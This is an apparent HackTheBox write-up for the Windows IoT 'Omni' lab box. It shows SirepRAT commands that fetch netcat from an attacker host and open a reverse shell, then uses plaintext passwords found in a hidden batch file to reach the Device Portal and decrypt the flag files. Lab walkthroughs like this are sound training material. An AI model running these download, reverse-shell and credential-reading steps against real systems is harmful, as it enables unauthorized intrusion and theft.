Omni — HackTheBox
TL;DR
This is a Window IOT core box and exposes a protocol that has a well built exploit. With credential to Windows device portal, you can get both the user and root flag.
Reconnaissance
Since they list this lab’s OS as “Other” it does not fit the convention OS of Linux or Windows. Start the recon with a NMAP scan.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8000/tcp open http-alt?
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknownNMAP reveals IIS running, this is an indicator that the underlying OS is a variant of windows. Port 8080 requires basic auth and the site title also helps reinforce that this is a windows box.
Window Device Portal lets users manage devices running windows IoT remotely. This is a IoT box. Now the goal is to get the credentials to access this portal. For this effort the trio of ports 29817, 29819 and 29820 will be used. These ports corresponds to the protocols Sirep/WPCon protocol. There is a well-developed exploit for these protocols.
Foothold
You can use this exploit to drop netcat on the box and the initiate a reverse shell.
kali@kali:~/HTB/Omni/SirepRAT$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell -exec bypass -c \"Invoke-WebRequest 'http://10.10.14.24:8000/nc64.exe' -OutFile 'C:\Data\Users\Public\nc.exe'\""
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
kali@kali:~/HTB/Omni/SirepRAT$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\Public\nc.exe 10.10.14.24 1337 -e cmd.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
kali@kali:~/HTB/Omni/SirepRAT$You will land in a default account.
kali@kali:~/HTB/Omni$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.204] 49693
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.C:\Users>echo %USERNAME% || whoami
echo %USERNAME% || whoami
DefaultAccount
User Reconnaissance
Now you can start doing enumeration to elevate to another user account that would have the user flag.
Listing all hidden files will reveal the path you need to progress.
PS C:\Users> Get-ChildItem -Path C:\ -Recurse -File -Hidden -Name
Get-ChildItem -Path C:\ -Recurse -File -Hidden -Name
...
Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat
Users\Default\ntuser.dat.LOG1
Users\Default\ntuser.dat.LOG2
Windows\system32\Microsoft\Protect\S-1-5-18\User\60cccb0e-2218-4962-8379-2b58fda526d1
Windows\system32\Microsoft\Protect\S-1-5-18\User\d479e9c4-a58e-4271-9baa-37e2838d4983
Windows\system32\Microsoft\Protect\S-1-5-18\User\PreferredThe content for this file (r.bat) reveals the password for both a user and the administrator. These credential will then be used through the Windows Device Portal to run commands on the device.
PS C:\Users> cat "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"
cat "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"
@echo off:LOOPfor /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /deletenet user app mesh5143
net user administrator _1nt3rn37ofTh1nGzping -n 3 127.0.0.1clsGOTO :LOOP:EXIT
Login with the user credential via the portal. From the Processes section, select “run command”. This will allow you to runs commands directly on the box.
From here you can use netcat to start a reverse shell.
From this shell you can start looking for files of interest. You will now find the user and root account folder are not in the normal location. Instead it is in “C:\Data\Users”.
PS C:\> Get-ChildItem -Path C:\ -Recurse -Force -File -Name -Include *.txt
...
Data\Users\administrator\root.txt
Data\Users\app\hardening.txt
Data\Users\app\user.txt
...
If you look at one of the files of interest, you will see that it is a powershell secure string. For both user and root flags you will need to extract the plaintext string from this. To do this you have to be logged in as either app or administrator account.
PS C:\> cat Data\Users\app\user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>User Flag
Login in through the portal as the user “app” and start a reverse shell. From the reverse shell, start powershell and execute the following.
(Import-CliXml -Path "C:\Data\Users\app\user.txt").GetNetworkCredential().PasswordThis will extract the plain text string from a secure string.
Root Flag
We repeat the same process here. From the portal, login as “administrator” and then start a reverse shell.
(Import-CliXml -Path "C:\Data\Users\administrator\root.txt").GetNetworkCredential().Password